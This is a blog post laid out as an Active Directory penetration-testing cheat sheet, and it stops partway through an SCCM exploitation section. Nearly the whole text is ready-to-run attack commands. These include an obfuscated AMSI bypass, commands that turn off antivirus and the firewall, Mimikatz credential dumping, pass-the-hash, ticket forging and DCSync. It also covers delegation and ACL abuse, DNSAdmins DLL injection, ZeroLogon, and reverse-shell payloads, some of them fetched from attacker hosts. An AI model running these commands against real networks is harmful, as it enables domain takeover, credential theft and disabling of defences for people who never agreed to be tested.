Hello Readers, Welcome to Hacking Dream. Today' post is on Active directory Penetration testing, this is a continuation of
Use the commands at your own Risk - I would suggest not to test these techniques in Production Environment.
THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS
Bypassing JEA
#View all the commands that we have access to
get-command *
#View the source code of the Commands/cmdlets
Get-Command -ShowCommandInfo -Name CmdLet_NAME
Get-Command -ShowCommandInfo -Name Get-ChildItem
#using SharpMapExec to bypass JEA or find interesting items
|.\SharpMapExec.exe ntlm winrm /user:USERNAME/password:"p@ssw0RD!" /domain:steins.local /computername:10.10.10.10
Note: ExpandString & Invoke-Expression might be vulnerable to command execution
#Examples of Bypasing JEA
get-something -command 'Hello $([void] (Get-Item C:\))'
get-something -command '$(""; ipconfig)'
#If Full language mode is enabled
function test() {whoami};test
#Bypassing JEA if start-Process is accessible
Enter-PSSession -ComputerName-ConfigurationName
Start-Process cmd.exe revshell.exe
Powershell Remote Access
Enable-PSRemoting #uses TCP - Port 5985, 5986 for SSL.
#Start a PS Session
Enter-PSSession -ComputerName kurisu.steins.local
#after logging into the session, store the process
$proc=Get-Process
#To login to the previous session,
$proc
#Start a new session & saves the session
$sess = New-PSSession -ComputerName kurisu.steins.local
#check the session
$sess
#login to the prev session; as long as we do not kill it
Enter-PSSession -Session $sess
or
$SecPassword = ConvertTo-SecureString 'PASSWORD@!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Steins.local\Bhanu_Admin', $SecPassword)
$s = New-PSSession -Credential $Cred
Enter-PSSession -Session $s
or
#login with the connection URL
Enter-PSSession -ConnectionUri http://10.10.10.10:5985/wsman -Credential $cred
#Add a Machine to TrustedHosts
net start winrm
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "10.10.10.10"
#logging into a Server
Set-Item WSMan:\localhost\Client\TrustedHosts -Value "192.168.1.1"
$SecPassword = ConvertTo-SecureString 'Password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.local\USER', $SecPassword)
$sess=New-PSSession -ComputerName 192.168.1.1 -Credential $Cred -Authentication Negotiate
Enter-PSSession -Session $sess
#Copying files to a logged in session using powershell
Copy-Item -ToSession $Sess -path C:\mimikatz.exe -Destination c:\temp
One-to-Many - PSSession:
=============================
- Executes commands parallely
- non-interactive
- Invoke-Command #cmdlet used to implent one to many
- can run scripts
- can use -Credential parameter to pass alternate creds
#Execute Scripts on a different machine:
Invoke-Command -ComputerName CruelSun -ScriptBlock{whoami;hostnane}
#Execute Scripts on a list of severs
Invoke-Command -ComputerName (Get-Content servers.txt) -ScriptBlock{whoami;hostnane}
#Run a file/command from a specific location
Invoke-Command -ComputerName CruelSun -Filepath C:\downloads\powerup.ps1
#If powershell is running in constraint language mode, we cannot run some cmdlets,etc..cannot use .Net classes as well. if the server is running with constrained lang mode, we cannot run .net classes and some other suspicious functions
#if you are unable to run the script - check the language:
Invoke-Command -ComputerName (Get-Content servers.txt) -ScriptBlock{$ExecutionContext.SessionState.LanguageMode}
#Run local function on a remote machine:
Invoke-Command -ComputerName CruelSun -ScriptBlock ${function:Get-ADTrust -Identity steins.local}
Invoke-Command -Filepath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content servers.txt)
Invoke-Command -ComputerName CruelSun -ScriptBlock ${function:Get-PassHashes} - ComputerName (Get-Content servers.txt )
#Run local script on a session:
#Run powerview.ps1 into the memory of the session
Invoke-Command -Filepath C:\downloads\powerup.ps1 -Session $sess
#powerup.ps1 functions will be loaded on the target session, so, we can run it directly
Enter-PSSession -Session $sess
Execute Stateful commands using Invoke-Command:
$sess = New-PSSession -ComputerName CruelSun
Invoke-Command -Session $sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $sess -ScriptBlock {$Proc.Name}
Disable AV on a Target Machine and upload a file
#Create a session
$sess = New-PSsession -ComputerName Server1
#Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#upload a file
Invoke-Command -Sessoion $sess -FilePath C:\Invoke-Mimikatz.ps1
#login to the session
Enter-PSsession $sess
#Bypass AMSI
SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Converting Plain Text into RC4/NTLM hash
python
>>> import hashlib
>>> print(hashlib.new('md4', 'Password123'.encode('utf-16le')).hexdigest())
8828530d622ef2cac9f91ec614f7ca79
OverPass The Hash
mimikatz.exe
sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe
#Run commands as the user that used for PTH
Invoke-Command -ComputerName Server1.steins.local -ScriptBlock{whoami; whoami /groups; hostname}
#Create a session
$sess = New-PSsession -ComputerName Server1
#Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess
#login to the session
Enter-PSsession $sess
#Dump Creds from the target machine
IEX(New-Object Net.WebClient).downloadString('http://KALI_IP:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
Pass the Ticket
Mimikatz
#Tickets are exported to present working directory
mimikatz.exe
#Download all the tickets
sekurlsa::tickets /export
kerberos::ptt ticket.kerbi
or
invoke-module .\Invoke-Mimikatz.ps1
invoke-mimikatz -Command '"Mimikatz::debug" "sekurlsa:;tickets /export" "exit"'
invoke-mimikatz -Command '"Mimikatz::debug" "kerberos::ptt ticket.kerbi" "exit"'
#list the available tickets
klist
Rubeus
#Triage the available tickets
.\Rubeus.exe triage
#display all the available tickets, copy the base64 ticket and remove all spaces and save it as .kirbo file. it can be used to ptt
.\Rubeus.exe dump
#pass a ticket
.\Rubeus.exe ptt /ticket:BASE64_KERBEROS_TICKET.kirbi
#Kerberoast
.\Rubeus.exe kerberoast /domain:steins.local /user:User1 /format:hashcat /outfile:hash.txt
#AskTGT
Rubeus.exe asktgt /user:server$ /enctype:RC4 /rc4:da71cba0f3b7a64d4318bd52c5ed4237 /domain:steins.local /dc:dc.steins.local /ptt
#Impersonate as a user
Rubeus.exe s4u /ticket:srv1_tgt /impersonateuser:Administrator /outfile:TGS_administrator
#Create TGS and import into memory
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv_tgt /altservice:cifs/srv.steins.local /domain:steins.local
Mimikatz:
#Dump Credentials on a local machine using Mimikatz
Invoke-Mimikatz -DumpCreds
#Dump creds of a target machine/ DC creds:
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName steinsDC.steins.local
#Dump Creds on Multiple Remote Machines:
Invoke-Mimikatz -DumpCreds -ComputerName @("ststem1.steins.local","system2.steins.local")
#Over Pass the hash - Generate Tokens from Hashes: Writing to lsass.exe
Invoke-Mimikatz -Command '"sekurlsa:pth /user:Administrator /domain:steins.local /ntlm:/run:powershell.exe"'
sekurlsa::pth /user:Username /domain:steins.local /rc4:97179aeefd6f3a6d329c37184fc639af
Abusing PrinterBug
#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -ewq $True}
#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'
#Run SampleSpool.exe on the unconstrianed degelation enabled machine
SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN
OR
proxychains python3 printerbug.py steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'
sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support
#Relay attacks - Capturing SMB hashes
Import-Module .\Inveigh.ps1
#Start collecting hashes, we will see hashes whenever a user tries to access something non-existant via SMB
Invoke-Inveigh -ConsoleOutput Y
#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Abusing ADIDNS
Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.21.10 -Verbose
Import-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y
#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"
DCSync Attack
- Usually Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default
Import-Module ./Powerview.ps1
#Select the domain to attack
Get-ForestGlobalCatalog
#Get the object ACL matching ObjectAceType = DS-Replication for the pentesting.local forest & check if any of the user to whom we have acess to has dcsync privs
Get-ObjectACL "DC=steins,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -like 'DS-Replication*')
#Run Mimikatz as Domain Admin and run below command
mimikatz.exe
lsadump::dcsync /domain:steins.local /all /csv
or
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins.local\krbtgt"'
#use DCSync feature to get krbtgt hash from any machine(Need DA privs):
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN_NAME\krbtgt"'
#Downloading DC Hashes without logging as Domain Admin: this command should be run as admin, modifying acl
Set-ADACL -DistinguishedName 'DC=steins,DC=steins,DC=local' -Principal USERNAME -GUIDRight DCSync -Verbose
# Running as a low priv user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins\Administrator"'
Exploiting WriteDacl - DCSync
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync
Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain
lsadump::dcsync /domain:testlab.local /user:Administrator
or
secretsdump.py username:[email protected]
or
aclpwn -f username -t steins.local --domain steins.local --server 10.10.10.10
Change User's Password in AD
$UserName = "VICTIM_Username"
$UserPassword = ConvertTo-SecureString 'P@$$W0rd' -AsPlainText -Force
$Domain = "DOMAIN_name"
$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)
$ContextArguments = @{ 'Identity' = $UserName }
$ContextArguments['Domain'] = $Domain
$ContextArguments['Credential'] = $Cred
$Context = Get-PrincipalContext @ContextArguments
$User = [System.DirectoryServices.AccountManagement.UserPrincipal]::FindByIdentity($Context.Context, $UserName)
if ($User) {
Write-Verbose "Found user '$UserName'"
try {
$TempCred = New-Object System.Management.Automation.PSCredential('a', $UserPassword)
$User.SetPassword($TempCred.GetNetworkCredential().Password)
$User.Enabled = $True
$Null = $User.Save()
Write-Verbose "Password for user '$UserName' successfully reset"
}
catch {
Write-Warning "Error setting password for user '$UserName' : $_"
}
}
else {
Write-Warning "Unable to find user '$UserName'"
}
Un-Constrained Delegation
Ignore Domain controllers as in the unconstrained delegation enabled machines
#Find systems with UnConstrained Delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
Get-NetComputer -UnConstrained
#Get the hashes of the Unconstrained_user to login as the user.
#start powershell cmd
Invoke-Mimikatz -Command '"sekurlsa:pth /user:Unconstrained_user /domain:steins.local /ntlm:/run:powershell.exe"'
#check if this user has local admin access on any machines
.\powerview.ps1
Find-LocalAdminAccess
#Login to the machine on which unconstrained-account has local admin access
$sess = New-PSSession -ComputerName unconstained_machine.steins.local
#Bypass AMSI
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
#Run Mimikatz on the target
Invoke-Command -FilePath C:\downloads\Invoke-Mimikatz.ps1 -Session $sess
#Downloads all the tickets from the lsass and saves them on the disk
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
#use the downloaded ticket and dump it into the memory to access other stuff
Invoke-Mimikatz -Command '"kerberos::ppt" KIRBI_TICKET_Path'
Resource Based Constrained Delegation - Lateral Movement
#Import Powermad powershell module
Import-Module .\Powermad.psd1
#adding a machine object, normal domain user can add upto 10 machines to the domain by default.
New-MachineAccount -Domain steins.local -DomainController 192.168.2.1 -MachineAccount might$ -Password (ConvertTo-SecureString 'PASSWORD' -AsPlainText -Force) -Verbose
#find a machine to which we have write permission using ACL Scanner/bloodhound
#Adding a role based constrained delegation on Server1. if we have write permission to 'might' machine account, we can access Sever1 as any user in the domain
Set-ADComputer Server1 -PrincipalsAllowedToDelegateToAccount might -Verbose
#view the permission that we set now
Get-ADComputer server -Server Server1.steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation
#Inject the ticket
.\Rubeus.exe s4u /user:might$ /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server1.steins.local /impersonateuser:Administrator /dc:dc.steins.local /ptt
#access the target machine
Enter-PSSession -ComputerName server1.steins.local
RBCD Persistance
-If we have DA permissions, we can use the RACE toolkit (https://github.com/samratashok/RACE ) to modify permissions of a computer object and use it later
#Sets RBCS on Server1 - and assign write permissions to server1 using the UserName
Set-DCPermissions -Method RBCD -DistinguishedName 'CN=server1,DC=steins,DC=local' -SAMAccountName USERNAME Verbose
#run on attaker machine to allow delegation for 'attacker' machine account
Set-ADComputer -Identify Server1 -PrincipalsAllowedToDelegateToAccount might$ -Verbose
#Inject the ticket
.\Rubeus.exe s4u /user:might$ /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server1.steins.local /impersonateuser:Administrator /dc:dc.steins.local /ptt
Resource Based Constrained Delegation on MSSQL Server
#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local
#Login to the MSSQL Server and run xpdritree on the dnsname u just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run rbcd_relay.py
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER
#View the privileges of the user
Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation
#Get TGT and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steibslocal -impersonate sql_admin steins.local/sql_user:Password@123
export KRB5CCNAME=sql_admin.ccache;sudo proxychains psexec.py user/[email protected] -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1
OR
.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt
dir \\server.steins.local\c$
psexec \\server.steins.local cmd.exe
Abusing UN-Constrained Delegation using SpoolSample
Delegation explained Here - Go through this
#Find un-constrained delagaion=true machines using Powerview
Get-NetComputer -UnConstrained
Get-DomainComputer -UnConstrained
#Find systems with UnConstrained Delegation using AD Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}
#Download SpoolSample and compile it and upload it on the server which has delegation=true
SpoolSample.exe TARGET_Server Delegation_enabled_server
Ex: SpoolSample.exe dc.steins.local delegated1.steins.local
#Run rubeus as System on an Interactive window, right after you run spoolsample.exe you should see the target Server's TGT
#use psexec to run as NT Authority/System
Psexec -s -d -i cmd.exe
Rubeus.exe monitor /interval:1
Note: if you are not seeing the target TGT on the rubeus even after many attemps, create a TGT for the server you have access to and try the target server again.
#Optional - generate a TGT for a server
Rubeus.exe asktgt /user:server1$ /enctype:RC4 /rc4:da71cba0f3b7a64d4318bd52c5ed4237 /domain:steins.local /dc:dc.steins.local /ptt
#Here you have lot of options, generate a TGS for yourself as you got the target's TGT. this can be done using rubeus.
#Copy paste the TGT, remove spaces and decode the base64 TGT and save it into a file.
#Generate a TGS into a file and import it later into memory
Rubeus.exe s4u /ticket:srv1_tgt /impersonateuser:Administrator /outfile:TGS_administrator /domain:steins.local /dc:dc.steins.local
#Importing into memory
Rubeus.exe ptt /ticket:TGS_TICKET
#Create a TGS for file system and import it directly into memory
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv1_tgt /altservice:cifs/sever1.steins.local /domain:steins.local
dir \\sever1.steins.local\C$
#gaining a shell
Rubeus.exe s4u /impersonateuser:administrator /self /ptt /dc:dc.steins.local /ticket:srv1_tgt /altservice:HOST/sever1.steins.local /domain:steins.local
psexec.exe \\sever1.steins.local cmd.exe
un-Constrained Delegation Rubeus cheatsheet
#List un-Constrained Delegation enabled users - PowerView
Get-DomainUser -ldapfilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
#List un-Constrained Delegation enabled Computers -
PowerView
Get-DomainComputer -Unconstrained
#Obtain a TGT for the Constained allowed user
.\Rubeus.exe asktgt /user:websvc /rc4:cc098f204c5887eaa8253e7c2749156f /outfile:TGT_websvc.kirbi
#Obtain a TGS of the Administrator user to self
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /impersonateuser:Administrator /outfile:TGS_administrator
#Obtain service TGS impersonating Administrator (CIFS)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:[email protected][email protected] /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST)
.\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:[email protected][email protected] /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
#Load ticket in memory
.\Rubeus.exe ptt /ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
Constrained Delegation
#find Constrained Delegation enabled. Using PowerView(dev)
Get-DomainUser -TrusedToAuth
Get -DomainComputer -TrusedToAuth
#find Constrained Delegation enabled using Active Directry Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
#Gain access to the constrained delegation enabled box and get TGT, fill will be saved to disk
kekeo# tgt::ask /user:websvc /domain:steins.local /rc4:NTLM_HASH
#using s4u from Kekeo, We request a TGS and it's saved in the file
#service : services with permissions can only be accessed, see where what can access using admodule/powerview;
tgs::s4u /tgt:Tgt_TICKET_PATH.kirbi /user:[email protected] /service:cifs/server2.steins.local
or
tgs::s4u /tgt:Tgt_TICKET_PATH.kirbi /user:[email protected] /service:cifs/server2.steins.local|ldap/dc.steins.local
#Inject the TGS and gain a shell
Invoke-Mimikatz -command '"kerberos::ptt TGS_PATH.kirbi"'
Method-II
#using s4u from Kekeo_one (no SNAME validation)
#Here we have accesds to not just the service that we have access to but all the service that uses the same machines account as there is no validation. this way we can run attack like dcsync without domain admin privileges
#Gain access to the constrained delegation enabled box and get TGT, fill will be saved to disk
kekeo# tgt::ask /user:steins-adminsrv.steins.local /domain:steins.local /rc4:NTLM_HASH
#Get TGS by using the TGT
tgs::s4u /tgt:TGT_TICKET_PATH.kirbi /user:[email protected] /service:time/steins.local | ldap/steins.local
#Inject the TGS and gain a shell, now we should have access to ldap as administrator
Invoke-Mimikatz -command '"kerberos::ptt TGS_PATH.kirbi"'
#Run DCSync attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:steins.local\krbtgt"'
Abusing ACL - Generic All
Import-Module ./PowerView.ps1
#Find a group with GenericAll Rights & check if we have access to to any of the group via ACL.
Get-DomainGroup -SamAccountName * | ? {($_.ActiveDirectoryRights -match 'GenericAll')}
#View the ACL's of the group
Get-ObjectAcl -ResolveGUIDs | ? {($_.objectdn -eq "CN=Domian Admins,DC=steins,DC=local") -and ($_.ActiveDirectoryRights -match 'GenericAll')}
#if your account has GenericAll Access to the group, we can add ourselves to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members UserName
#View if you are a part of the group
Get-DomainGroupMember -SamAccountName 'Domain Admins'
Abusing Generic Write on user
#find a user on whom we have generic write acess and add a script block (which contains a rev shell) to the user account. som when the user logins - we get rev shell
#Enumerate to find all objects with GenericWrite
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite')}
#Create a rev shell
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f exe > revshell.exe
#Copy the rev shell on a SMB share which is accessible to the target machine.
#Set the script path to the user
Set-DomainObject -Identity UserName -Set @{'scriptpath'='\\share\revshell.exe'} -Verbose
#start a listner, when the user logs in we get a rev shell as the user.
rlwrap nc.exe -nvlp 9001
Generic Write - Constrained delegation attack
powershell.exe -ep bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
import-module ./PowerView.ps1
import-module ./Powermad.ps1
New-MachineAccount -MachineAccount mighty -Password $(ConvertTo-SecureString 'Password@1234' -AsPlainText -Force) -Verbose
#if you do not have shell as the user -run below 2 commands and add -Credential $Cred along with the command whereever you need to elevate using these creds
$SecPassword = ConvertTo-SecureString 'PASSWORD@123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.local\bhanu', $SecPassword)
$ComputerSid = Get-DomainComputer mighty -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer Steins-DC.steins.local | Set-DomainObject -Credential $Cred -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -verbose
./Rubeus.exe hash /password:'Password@1234' /user:mighty /domain:roundsoft.local
./Rubeus.exe s4u /user:mighty$ /rc4:A0989207854B684F07B5B6FE68169A35 /impersonateuser:TARGET_User /msdsspn:cifs/Steins-DC /ptt
klist
dir \\steins-dc\c$ #check if it lists the directory
psexec.exe \\steins-dc cmd.exe
#Create a meterpreter shell using HackTheWorld and upload it to dc
certutil -f -split -urlcache http://10.10.10.10:8000/hac7777.exe
migrate the session to NT Authority System download hives
reg save HKLM\SYSTEM C:\system
reg save HKLM\SAM C:\sam
or use the below automated script
Generic Write -Constrained delegation attack
powershell.exe -ep bypass
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Import-Module .\PowerView.ps1
Import-Module .\Powermad.ps1
function exploit ($Machine){
New-MachineAccount -MachineAccount $Machine -Password $(ConvertTo-SecureString 'Password@1234' -AsPlainText -Force) -Verbose
$ComputerSid = Get-DomainComputer $Machine -Properties objectsid | Select -Expand objectsid
Write-Output "[+] SID: $ComputerSid"
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer STEINS-DC -SearchBase "LDAP://DC=steins,DC=local" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -SearchBase "LDAP://DC=steins,DC=local" -verbose
$RawBytes = Get-DomainComputer STEINS-DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
Write-Output "[+] Done!"
}
#save the script as mysrc.ps1
. .\mysrc.ps1
exploit mighty
./Rubeus.exe hash /password:'Password@1234' /user:mighty /domain:roundsoft.local
./Rubeus.exe s4u /user:mighty$ /rc4:A0989207854B684F07B5B6FE68169A35 /impersonateuser:TARGET_User /msdsspn:cifs/Steins-DC /ptt
DNSAdmins Group to DC
- This attack works only if you are part of the default DNSAdmins Group.
DLL entry is stored at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ - ServiceLevelPlugindll; Delete the entry after you are done with the attack
#Create a Reverse shell DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.30 LPORT=443 -f dll -o rev.dll
#Start SMB Server
sudo smbserver.py shell .
#on Target who is a part of DNSAdmins Group
dnscmd.exe /config /serverlevelplugindll \\10.10.10.10\shell\rev.dll
or
dnscmd.exe dc.steins.local /config /serverlevelplugindll \\10.10.10.10\shell\rev.dll
#Restart DNS service
sc.exe \\HOSTNAME stop dns
sc.exe \\HOSTNAME start dns
#Start a netcat Lister
nc -nvlp 443
Exploting Knock & Pass Kerbeoros MS14-068
apt-get install krb5-user cifs-utils rdate
#add DCIP to /etc/hosts
10.10.10.10 dc.steins.local dc
# Add the target as a namesever in /etc/resolv.conf
nameserver 10.10.10.10
#take a backup of /etc/krb5.conf and replace it with below - Case Sensitive
[libdefaults]
default_realm = HTB.LOCAL
[realms]
HTB.LOCAL = {
kdc = mantis.htb.local:88
admin_serve = mantis.htb.local
default_domain = HTB.LOCAL
}
[domain_realm]
.domain.internal = HTB.LOCAL
domain.internal = HTB.LOCAL
#Generate a kerberos ticket
kinit james
#View the ticket
klist
#Lets generate a Golden Ticket
goldenPac.py -dc-ip 10.10.10.10 -target-ip 10.10.10.10 steins.local/[email protected]
Abusing ZeroLogin CVE-2020-1472
mimikatz.exe
#check if the dc is vulnerable or not
lsadump::zerologon /taret::dc.steins.local /account:dc$
#Exploiting the vuln; password is removed for DC.
lsadump::zerologon /taret::dc.steins.local /account:dc$ /exploit
#we can run dcsync attack to get the hash now. if we can get krbtgt hash - golden ticket and silver ticket attacks are possible
lsadump::dcsync /dc:dc.steins.local /authuser:dc$ /authdomain:anything.local /authpassword:"" /authntlm /user:krbtgt
Exploiting SCCM Server
Download and Import PowerSCCM.ps1 and add the below line to use custom payload without any encoding
$LaunchCMD = "powershell.exe iex(invoke-webrequest('http://10.10.10.10/rev.ps1') -UseBasicParsing)"
#Find SCCM Sitecode and Server Hostname
PowerShell Find-LocalSccmInfo
#Connect to SCCM Server, creating a session
PowerShell New-SccmSession -ComputerName SCCM.steins.local -SiteCode BA1 -ConnectionType WMI
#View connected SCCM Agents
Get-SCCMSession | Get-SccmComputer
#List All Applications
Get-SCCMSession | Get-SCCMApplication
#If you have multiple targets, create a collection and push the payload/exploit to the target at once
Get-SCCMSession | New-SCCMCollection -CollectionName "targets" -CollectionType "Device"
#View All collections
Get-SCCMSession | Get-SCCMCollection | Select Name
#Add a server to our new collection
